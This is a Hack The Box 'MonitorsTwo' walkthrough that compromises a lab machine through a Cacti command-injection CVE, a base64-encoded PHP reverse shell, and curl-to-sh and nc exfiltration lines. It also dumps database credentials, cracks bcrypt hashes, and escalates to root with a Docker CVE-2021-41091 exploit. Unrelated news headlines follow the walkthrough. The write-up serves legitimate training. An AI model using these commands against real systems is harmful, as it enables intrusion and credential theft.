Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 
<session_id>                                                                                                                                                                                             
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/linux/http/cacti_unauthenticated_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options

Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT               8080             yes       The target port (TCP)
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /                yes       The base path to Cacti
   URIPATH                              no        The URI to use for this exploit (default is random)
   VHOST                                no        HTTP server virtual host
   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set rhosts http://10.10.11.211/
rhosts => http://10.10.11.211/
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set rport 80
rport => 80
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set lhost 10.10.14.84
lhost => 10.10.14.84
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > exploit

[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
[*] Enumerating local_data_id values for host_id 1
[+] Found exploitable local_data_id 6 for host_id 1
[*] Command Stager progress - 100.00% done (1118/1118 bytes)
[*] Exploit completed, but no session was created.

Nothing, but we have a lot of exploits to try. Next one!

GitHub – sAsPeCt488/CVE-2022-46169: PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22
PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22 – GitHub – sAsPeCt488/CVE-2022-46169: PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22
HTB MonitorsTwo WalkthroughGitHubsAsPeCt488
HTB MonitorsTwo Walkthrough

Let’s try if the target is vulnerable!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "curl http://10.10.14.84/" http://10.10.11.211/
[*] Trying for 1 - 100 host ids
[+] Exploit Completed for host_id = 1

And it seems yes.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.84:80
[Sun May 14 16:26:09 2023] PHP 8.2.4 Development Server (http://10.10.14.84:80) started
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 Accepted
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 [404]: GET / - No such file or directory
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 Closing

Really good, let’s understand who am I!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "curl "http://10.10.14.84/$(whoami)"" http://10.10.11.211/
[*] Trying for 1 - 100 host ids
[+] Exploit Completed for host_id = 1

What I expected!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.84:80 
[Sun May 14 16:39:09 2023] PHP 8.2.4 Development Server (http://10.10.14.84:80) started
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 Accepted
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 [404]: GET /www-data - No such file or directory
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 Closing

We can then to the reverse shell… listener listening (that’s horrible)…

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444         
listening on [any] 4444 ...

…and attack!
After a lot of reverse shells, I found the right one:

php -r '$sock=fsockopen("10.10.14.84",4444);exec("/bin/bash <&3 >&3 2>&3");'

That I have to pass in base64!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "echo 'cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE0Ljg0Iiw0NDQ0KTtleGVjKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIik7Jw==' | base64 -d | sh" http://10.10.11.211/
[*] Trying for 1 - 100 host ids

You can generate your reverse shell in a simple way using this site:

Online – Reverse Shell Generator
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
HTB MonitorsTwo WalkthroughReverse Shell Generator
HTB MonitorsTwo Walkthrough

And the shell is served!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444         
listening on [any] 4444 ...
10.10.11.211: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.10.11.211] 44074
whoami
www-data

It seems I don’t have permission to read the /home folder; let’s look for any clues left in the surroundings before running a session with linpeas. Let’s check the list of the users in the meantime.

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

What? There doesn’t seem to be any user who can log in! there is something strange about this BOX!

I found a SQL script that creates the database for the portal and looking inside…

[...]
CREATE TABLE user_auth (
  `id` mediumint(8) unsigned NOT NULL auto_increment,
  `username` varchar(50) NOT NULL default '0',
  `password` varchar(256) NOT NULL default '',
  `realm` mediumint(8) NOT NULL default '0',
  `full_name` varchar(100) default '0',
  `email_address` varchar(128) NULL,
[...]
INSERT INTO user_auth VALUES (1,'admin','21232f297a57a5a743894a0e4a801fc3',0,'Administrator','','on','on','on','on','on','on',2,1,1,1,1,'on',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (3,'guest','43e9a4ab75570f5b',0,'Guest Account','','on','on','on','on','on',3,1,1,1,1,1,'',-1,-1,'-1','',0,0,0);
[...]

Undecided between a simple hexadecimal algorithm or an MD5, it was enough for me to search for the string online to discover the very mysterious password of the admin user.

MD5 reverse for 21232f297a57a5a743894a0e4a801fc3
Reverse string for MD5 hash 21232f297a57a5a743894a0e4a801fc3
HTB MonitorsTwo WalkthroughMD5 Center MD5 conversion and reverse lookup

However, the password must have been changed, as I cannot access the portal. Another interesting file was the config.php in the include folder.

[...]
/*
 * Make sure these values reflect your actual database/host/user/password
 */

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'db';
$database_username = 'root';
$database_password = 'root';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;

/*
 * When the cacti server is a remote poller, then these entries point to
 * the main cacti server. Otherwise, these variables have no use and
 * must remain commented out.
 */

#$rdatabase_type     = 'mysql';
#$rdatabase_default  = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port     = '3306';
#$rdatabase_retries  = 5;
#$rdatabase_ssl      = false;
#$rdatabase_ssl_key  = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca   = '';
[...]

Try to connect to the MySQL server. Unfortunately, I can’t spawn a tty shell and the mysql command line seems to not answer in the best way, so I have to execute commands manually using the mysql command line execution argument.

$ mysql -h db -u root -p cacti -e "show databases;"
Enter password: root
Database
information_schema
cacti
mysql
performance_schema
sys

Let’s list the tables.

$ mysql -h db -u root -p cacti -e "show tables"
Enter password: root
Tables_in_cacti
aggregate_graph_templates
[...]
sessions
settings
settings_tree
settings_user
settings_user_group
sites
[...]
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
[...]

And the contents of some interesting tables.

$ mysql -h db -u root -p cacti -e "select * from user_auth;"
Enter password: root
id      username        password        realm   full_name       email_address   must_change_password    password_change show_tree       show_list       show_preview    graph_settings  login_opts      policy_graphs    policy_trees    policy_hosts    policy_graph_templates  enabled lastchange      lastlogin       password_history        locked  failed_attempts lastfail        reset_perms
1       admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC    0       Jamie Thompson  admin@monitorstwo.htb           on      on      on      on      on      2       1       1       11       on      -1      -1      -1              0       0       663348655
3       guest   43e9a4ab75570f5b        0       Guest Account           on      on      on      on      on      3       1       1       1       1       1               -1      -1      -1              00       0
4       marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C    0       Marcus Brune    marcus@monitorstwo.htb                  on      on      on      on      1       1       1       11       on      -1      -1              on      0       0       2135691668

Well, the admin user changed his password and a new user appeared in the list… we have a couple of interesting passwords to try and crack.

Save the password into a file.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ cat pwd.hash 
admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

Let’s that hashcat tries to identify the algorithm of the hashing method.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ hashcat pwd.hash                                                
hashcat (v6.2.6) starting in autodetect mode

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1406/2876 MB (512 MB allocatable), 2MCU

No hash-mode matches the structure of the input hash.

Started: Mon May 15 15:38:03 2023
Stopped: Mon May 15 15:38:15 2023

Mmmm, not so lucky today. Let’s try with my friend john!

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ john pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (marcus)

Definitely better.

HTB MonitorsTwo Walkthrough

Even though he’s a portal user, he seems to have trouble logging in, but it’s much better if you use him to log in over ssh!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ ssh marcus@10.10.11.211                                                                                                        
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 15 May 2023 09:02:46 PM UTC

  System load:                      0.0
  Usage of /:                       64.1% of 6.73GB
  Memory usage:                     34%
  Swap usage:                       0%
  Processes:                        292
  Users logged in:                  1
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:ff04

  => There is 1 zombie process.


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Mon May 15 20:40:13 2023 from 10.10.14.169
marcus@monitorstwo:~$ cat user.txt 
2******************************a

Thus obtaining the user flag! At first glance, it seems like I can’t do much with this user, so let’s download linpeas and make it available from our native php web server.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230514-85dabdc9/linpeas.sh                               
--2023-05-16 15:36:42--  https://github.com/carlospolop/PEASS-ng/releases/download/20230514-85dabdc9/linpeas.sh
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/1f1f0080-bb74-490c-ac12-16e66dcb0699?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230516T193601Z&X-Amz-Expires=300&X-Amz-Signature=267efcd94629b388ffc0decf9f86725f34b28929ad55df95f9a745fcb504ef9d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-16 15:36:43--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/1f1f0080-bb74-490c-ac12-16e66dcb0699?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230516T193601Z&X-Amz-Expires=300&X-Amz-Signature=267efcd94629b388ffc0decf9f86725f34b28929ad55df95f9a745fcb504ef9d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835306 (816K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                         100%[=============================================================================================================>] 815.73K  2.89MB/s    in 0.3s    

2023-05-16 15:36:43 (2.89 MB/s) - ‘linpeas.sh’ saved [835306/835306]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ php -S 10.10.14.69:80
[Tue May 16 15:37:25 2023] PHP 8.2.4 Development Server (http://10.10.14.69:80) started

Let’s get ready to receive the scan from the BOX.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/dwnl]
└─$ nc -lp 4445 | tee lpeasout.file

And we initiate the attack on the remote machine without leaving any traces.

curl http://10.10.14.69/linpeas.sh | sh | nc 10.10.14.69 4445

Let’s look at the most interesting points of scan linpeas.

[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                            
tcp        0      0 127.0.0.1:35077         0.0.0.0:*               LISTEN      -                                                                                                                        
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
[...]
                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                                                                                       
                      ╚════════════════════════════════════╝                                                                                                                                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
strings Not Found                                                                                                                                                                                        
-rwsr-xr-- 1 root messagebus 51K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Apr  4 11:56 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
-rwxr-sr-x 1 root shadow 43K Feb  2 09:22 /usr/sbin/pam_extrausers_chkpwd                                                                                                                                
-rwxr-sr-x 1 root shadow 43K Feb  2 09:22 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 343K Mar 30  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
[...]

This time I don’t seem to have found much of interest in the linpeas session, apart from an open port locally; we will investigate this shortly. Let’s try to take a look at the suggested CVEs, even if by now, most of the time they are false positives.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/dwnl]
└─$ grep -i "CVE-" lpeasout.file                   
[+] [CVE-2022-2586] nft_object UAF
[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

If I really can’t find anything else, I’ll come back to it.

marcus@monitorstwo:~$ curl http://127.0.0.1:35077/ -v
*   Trying 127.0.0.1:35077...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 35077 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:35077
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Date: Tue, 16 May 2023 20:15:22 GMT
< Content-Length: 19
< Content-Type: text/plain; charset=utf-8
< 
* Connection #0 to host 127.0.0.1 left intact
404: Page Not Found

It doesn’t seem to come back to me much. I can’t find any info on which process is using port 35077 with the conventional methods (netstal, lsof, ecc…). After double-checking the CVEs suggested by linpeas, but without getting any success, I started reading posts in the official HTB forum. Many users talk about SUID and docker (things I’ve already checked among other things but maybe not good enough at this point). So I focus on these two clues.

Files available with SUID permissions don’t help me and I can’t even launch docker commands due to lack of permissions. Searching for some exploits I find a lot of docker stuff.

Docker : Security vulnerabilities
Security vulnerabilities related to Docker : List of vulnerabilities related to any product of this vendor. Cvss scores, vulnerability details and links to full CVE details and references
HTB MonitorsTwo Walkthrough

The docker version available on the machine could help me identify a specific exploit.

marcus@monitorstwo:~$ docker --version
Docker version 20.10.5+dfsg1, build 55c4c88

I download the results for an easier search (fortunately it’s only two pages). I import the data into an excel file and perform a quick search based on the docker version in the BOX. Three results come out.

The CVE-2021-41092 (execution vulnerability), CVE-2021-21285 (unknown) and CVE-2021-21284 (Traversal path vulnerability).

The CVE-2021-41092 inspires me, it allows the execution of commands following a login to a personal docker registry, I look for some exploits, but I can’t find anything useful and even by approaching some personal experiments, I get nothing.
CVE-2021-21285 doesn’t really work for me, causing the docker daemon to crash when pulling an image (which I can’t do due to a lack of permissions, among other things). The CVE-2021-21284 remains for which I can’t find anything as interesting as the previous ones. After a while, I search online for some other exploits on the specific version (Docker 20.10.5 exploit) and among the first results there is an interesting git repository.

GitHub – UncleJ4ck/CVE-2021-41091: POC for CVE-2021-41091
POC for CVE-2021-41091. Contribute to UncleJ4ck/CVE-2021-41091 development by creating an account on GitHub.
HTB MonitorsTwo WalkthroughGitHubUncleJ4ck
HTB MonitorsTwo Walkthrough

The exploit is not on the docker CLI, but on the docker engine itself (the Moby). Taking a look at the script and executing some commands from the BOX’s shell to understand if the vulnerability is actually present, I don’t get excellent results, but trying doesn’t cost anything anyway, so I download the script on my machine and then execute it, as always, without a trace!

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ wget https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh                
--2023-05-20 06:09:32--  https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2446 (2.4K) [text/plain]
Saving to: ‘exp.sh’

exp.sh                                             100%[=============================================================================================================>]   2.39K  --.-KB/s    in 0.002s  

2023-05-20 06:09:32 (1.03 MB/s) - ‘exp.sh’ saved [2446/2446]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ php -S 10.10.14.78:80
[Sat May 20 06:09:35 2023] PHP 8.2.4 Development Server (http://10.10.14.78:80) started

Ready!

marcus@monitorstwo:/tmp$ bash <(curl -s http://10.10.14.78/exp.sh)
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit
marcus@monitorstwo:/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
bash-5.1# whoami
root
bash-5.1# ls -la /root/root.txt
-rw-r----- 1 root root 33 May 20 02:50 /root/root.txt
bash-5.1# cat /root/root.txt
6******************************6

Woooo, what a fantastic surprise, even if from the preliminary tests it didn’t seem feasible to me. Anyway, another interesting BOX indeed. As always, while waiting for another machine, have good hacking. That’s all folks.

Secjuice – ​Read More

These alternatives to popular apps can help reclaim your online life from billionaires and surveillance

/in

Not every app or service is trying to monetize your personal data. Here are some of our favorite alternatives to popular apps.

© 2024 TechCrunch. All rights reserved. For personal use only.

Security News | TechCrunch – ​Read More

Why New York is a Prime Location for Leading Mobile Development Agencies

/in

New York, the city that never sleeps, is renowned as a global epicentre for innovation, creativity, and business…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More

Andrew Tate’s University Breach: 1 Million User Records and Chats Leaked

/in

Andrew Tate’s “The Real World” platform has been breached, again, leaking user data including emails and private chat…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More

Russia’s Ballistic Missile Attack on Ukraine Is an Alarming First

/in

This is the first time Russia has used its so-called Oreshnik intermediate-range ballistic missile in combat. The launch also serves as a warning to the West.

Security Latest – ​Read More

The rise and fall of the ‘Scattered Spider’ hackers

/in

